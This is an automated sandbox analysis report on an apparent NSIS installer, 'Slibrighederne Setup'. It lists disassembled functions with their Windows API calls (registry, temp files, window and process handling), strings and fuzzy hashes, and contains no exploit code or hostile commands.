Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Slibrighederne Setup: Installing
API String ID: 3540041739-771727381
Opcode ID: 2fef8783583e05583b13a3a111104ffe67f6f47bd1d4956f9e9fcfce1648db61
Instruction ID: bb6c02d87b5a590dcf5e60bd08fb8011c89fc701b4454ccbd5a96a7ae09536e5
Opcode Fuzzy Hash: 2fef8783583e05583b13a3a111104ffe67f6f47bd1d4956f9e9fcfce1648db61
Instruction Fuzzy Hash: 6F11E773A041283BDB00666D9C41EAF3298DB82374F250637FA26F71D1F9799C1296E9

Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh73EF.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh73EF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh73EF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Strings

C:\Users\user\AppData\Local\Temp\nsh73EF.tmp, xrefs: 0040236B, 0040238D, 0040239D, 004023A8

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp
API String ID: 1356686001-3289883981
Opcode ID: ce52fc36f8c1539fe7cd04cfea426f8ee3955a46ddb773dda666e2c71c4fce69
Instruction ID: 3a938b5a8607202095c76e83426e5805640bb3b53fc5f2f09a26eea3e9d8e973
Opcode Fuzzy Hash: ce52fc36f8c1539fe7cd04cfea426f8ee3955a46ddb773dda666e2c71c4fce69
Instruction Fuzzy Hash: 7711A2B1E00118BFEB10AFA4DE49EAF7678FB50358F10413AF905B61D1D7B86D01AA69

Function 004038D3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,Slibrighederne Setup), ref: 0040396B

Strings

Slibrighederne Setup: Installing, xrefs: 004038D6
1033, xrefs: 004038D7, 004038E1, 00403952
"C:\Users\user\Desktop\xLDz0WPZYc.exe", xrefs: 004038D4
Slibrighederne Setup, xrefs: 0040395A

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\xLDz0WPZYc.exe"$1033$Slibrighederne Setup$Slibrighederne Setup: Installing
API String ID: 530164218-1143816872
Opcode ID: 5114115a6ebe5231764a3ce4d605c7881d7ff0c1eb634beed4f1a3f33a5eb945
Instruction ID: 871d24c221ce82b24610d398d310ce84231420a4e1270a2a5acaa8ae42907246
Opcode Fuzzy Hash: 5114115a6ebe5231764a3ce4d605c7881d7ff0c1eb634beed4f1a3f33a5eb945
Instruction Fuzzy Hash: 8511C6B1B046116BCB30DF55DC80A737BADEB85716364813FE802673A0D77DAD039A68

Function 1000180D Relevance: 7.7, APIs: 5, Instructions: 189COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 10001869
GlobalFree.KERNEL32(?), ref: 100019EF
GlobalFree.KERNEL32(?), ref: 100019F4

Memory Dump Source

Source File: 00000000.00000002.1880481343.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1880446902.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880503056.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880544481.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_xLDz0WPZYc.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 0c473814e0966ac58776859a9061c1e440c53011a0554eaa903a9fb75293bb16
Instruction ID: 97b6efd1b10b48d7ee9b7c7fbc92de58723c24235f199e6d6d25645bb0e8c5d4
Opcode Fuzzy Hash: 0c473814e0966ac58776859a9061c1e440c53011a0554eaa903a9fb75293bb16
Instruction Fuzzy Hash: DC512532D04159AEFB55DFB488A4AEEBBF6EF453C0F12416AE841B315DCA306E4087D2

Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
RegCloseKey.ADVAPI32(?), ref: 00402AA3
RegCloseKey.ADVAPI32(?), ref: 00402AC8
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 82858c02e32d41fd7ca38c30764bbd1566dd555d0b274e926b0c66c461654363
Instruction ID: 7e4692ed1c3e967feaf617caf8b683db29fbfa99fde863b1c96f6eb31ad0523a
Opcode Fuzzy Hash: 82858c02e32d41fd7ca38c30764bbd1566dd555d0b274e926b0c66c461654363
Instruction Fuzzy Hash: C8114C71A00109FFDF21AF90DE49DAB3B7DEB54349B104136FA05B10A0DBB49E51AF69

Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CD0
GetClientRect.USER32(00000000,?), ref: 00401CDD
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
DeleteObject.GDI32(00000000), ref: 00401D1B

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: b00f7ec418890f5e41557f0601765e71715314847e9ee516ccb0e33736116458
Instruction ID: f51ac8410cbf6ce335f498807c5bd2b5625ae864585cec2d5bc31dfd5d98a64c
Opcode Fuzzy Hash: b00f7ec418890f5e41557f0601765e71715314847e9ee516ccb0e33736116458
Instruction Fuzzy Hash: 6DF012B2A05115BFE701EBA4EE89DAF77BCEB44301B109576F501F2191C7789D018B79

Function 00401D26 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D29
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
ReleaseDC.USER32(?,00000000), ref: 00401D56
CreateFontIndirectA.GDI32(0040A7B8), ref: 00401DA1

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 6c97ca4c977f86aacd357c2655dec619d2d0312ab6bad79a0316e8acbd74949c
Instruction ID: e98614b17e7a5d10a155c4b6304f3e92ae7defc274e3a3420abb617ebef8a141
Opcode Fuzzy Hash: 6c97ca4c977f86aacd357c2655dec619d2d0312ab6bad79a0316e8acbd74949c
Instruction Fuzzy Hash: E3018671958340AFEB015BB4AE0ABAA3FB4E715705F208439F142B72E2C57854159B2F

Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30

Strings

!, xrefs: 00401BEC

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
Instruction ID: aec06c1df61e239cd4f76122eecd213935ad84fca4bb147c4325ce067fac4872
Opcode Fuzzy Hash: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
Instruction Fuzzy Hash: B82190B1A44208BFEF41AFB4CE4AAAE7BB5EF40344F14453EF541B61D1D6B89A40D728

Function 0040564D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405653
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 0040565C
lstrcatA.KERNEL32(?,00409014), ref: 0040566D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040564D

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4083868402
Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
Instruction ID: 2c4b20d64583e31d373f24845ccb5b94779d1f5d03349b34bc7780515f720d37
Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
Instruction Fuzzy Hash: 17D0A9626059306AE20223269C05E8B3A58CF02315B040423F200B22A2C73C2D418BFE

Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F09
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B

Part of subcall function 00405B1B: wsprintfA.USER32 ref: 00405B28

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: d5295571afff2b7ba06b8940d0c237b1bfad39176bc142ff4da2a602cba8f496
Instruction ID: 9b91fbd94c6ee64b88793a3c9b4d2d612c2f555b57ffdd8fee231bc1bbe1e40f
Opcode Fuzzy Hash: d5295571afff2b7ba06b8940d0c237b1bfad39176bc142ff4da2a602cba8f496
Instruction Fuzzy Hash: 37115E71A00108BEDB01EFA5D981DAEBBB9EF04344B20807AF505F21A2D7389E54DB28

Function 004056E6 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst7960.tmp,?,00405752,C:\Users\user\AppData\Local\Temp\nst7960.tmp,C:\Users\user\AppData\Local\Temp\nst7960.tmp,?,?,75573410,0040549D,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 004056F4
CharNextA.USER32(00000000), ref: 004056F9
CharNextA.USER32(00000000), ref: 0040570D

Strings

C:\Users\user\AppData\Local\Temp\nst7960.tmp, xrefs: 004056E7

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nst7960.tmp
API String ID: 3213498283-3518439782
Opcode ID: ac897d516f17d253cbbc7940845e643e929e97fc7ae9087a1bf94e6a79cb68aa
Instruction ID: e592660a4f44971662af148b318ca823341b0dace15123b29cd69db10dd58be8
Opcode Fuzzy Hash: ac897d516f17d253cbbc7940845e643e929e97fc7ae9087a1bf94e6a79cb68aa
Instruction Fuzzy Hash: F8F09651918F55ABFB3262285C54B775B8CCB95361F144477E680BB2C2C27C4C41EFAA

Function 00402BC5 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402DA5,?), ref: 00402BD8
GetTickCount.KERNEL32 ref: 00402BF6
CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C13
ShowWindow.USER32(00000000,00000005), ref: 00402C21

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a370bf3714c6657f4aa9727f83cb14b3507f4001cbab91db9230ec4a81342bf5
Instruction ID: 413067c0dd52ceff9b3bae724ffe8751623181a8cae7bdb8b5040e0cc41620bd
Opcode Fuzzy Hash: a370bf3714c6657f4aa9727f83cb14b3507f4001cbab91db9230ec4a81342bf5
Instruction Fuzzy Hash: 43F05E7094A220ABC6216F20BE8CD9F7BBCF704B52B124876F104B12E4D678D8C1DB9C

Function 00404E1A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404E49
CallWindowProcA.USER32(?,?,?,?), ref: 00404E9A

Part of subcall function 00403EBF: SendMessageA.USER32(00010444,00000000,00000000,00000000), ref: 00403ED1

Strings

, xrefs: 00404E2A

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ac110b3b9cb7c9f01e5231f91087d53fe1146d3d93b6dd99ce465d5e78f5ea73
Instruction ID: b130d42bb84d5447e475eed3bbf3cd484b2354f0b63da773ba138cf1eceff29e
Opcode Fuzzy Hash: ac110b3b9cb7c9f01e5231f91087d53fe1146d3d93b6dd99ce465d5e78f5ea73
Instruction Fuzzy Hash: CB015EB1500208ABDF219F61DC80AAB3A2AF7C5760F60413BFE04762D1D73A9D51E6E9

Function 0040573B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405BBD: lstrcpynA.KERNEL32(?,?,00000400,00403126,Slibrighederne Setup,NSIS Error), ref: 00405BCA

Part of subcall function 004056E6: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst7960.tmp,?,00405752,C:\Users\user\AppData\Local\Temp\nst7960.tmp,C:\Users\user\AppData\Local\Temp\nst7960.tmp,?,?,75573410,0040549D,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 004056F4
Part of subcall function 004056E6: CharNextA.USER32(00000000), ref: 004056F9
Part of subcall function 004056E6: CharNextA.USER32(00000000), ref: 0040570D

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst7960.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst7960.tmp,C:\Users\user\AppData\Local\Temp\nst7960.tmp,?,?,75573410,0040549D,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 0040578E
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst7960.tmp,C:\Users\user\AppData\Local\Temp\nst7960.tmp,C:\Users\user\AppData\Local\Temp\nst7960.tmp,C:\Users\user\AppData\Local\Temp\nst7960.tmp,C:\Users\user\AppData\Local\Temp\nst7960.tmp,C:\Users\user\AppData\Local\Temp\nst7960.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst7960.tmp,C:\Users\user\AppData\Local\Temp\nst7960.tmp,?,?,75573410,0040549D,?,C:\Users\user\AppData\Local\Temp\,75573410), ref: 0040579E

Strings

C:\Users\user\AppData\Local\Temp\nst7960.tmp, xrefs: 00405741, 00405746, 0040574C, 00405787, 0040578D, 00405795, 0040579D

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nst7960.tmp
API String ID: 3248276644-3518439782
Opcode ID: 9a736f538e34e6517b1cfb206b5d1e24f8bbb7c3ea1033a0713caced6fd308ff
Instruction ID: 0bfa87336d0542cea5c484b91c2ff8d9f7cc7eb9e64ccd09754914f330dce399
Opcode Fuzzy Hash: 9a736f538e34e6517b1cfb206b5d1e24f8bbb7c3ea1033a0713caced6fd308ff
Instruction Fuzzy Hash: 75F0A925105E5156C62237365C05E9F1654CD82358F29053BF855B32D1DA7C8943ED7E

Function 0040536C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004214E0,Error launching installer), ref: 00405395
CloseHandle.KERNEL32(?), ref: 004053A2

Strings

Error launching installer, xrefs: 0040537F

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 78f56604072923640aaa3b77c56e1735b9967a1a3caa926f278c393605d87831
Instruction ID: 6a75270a898cf8bf2a78dd2ca891eea3d0b09d4229ae2a6fcbb9112043bcd623
Opcode Fuzzy Hash: 78f56604072923640aaa3b77c56e1735b9967a1a3caa926f278c393605d87831
Instruction Fuzzy Hash: 5EE0BFB4A04209BFFB10EBA4ED45F7B7AADEB10788F408521BD14F2160D778A8108A79

Function 00403579 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75573410,00403551,00403375,?), ref: 00403593
GlobalFree.KERNEL32(007CCDD8), ref: 0040359A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040358B

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
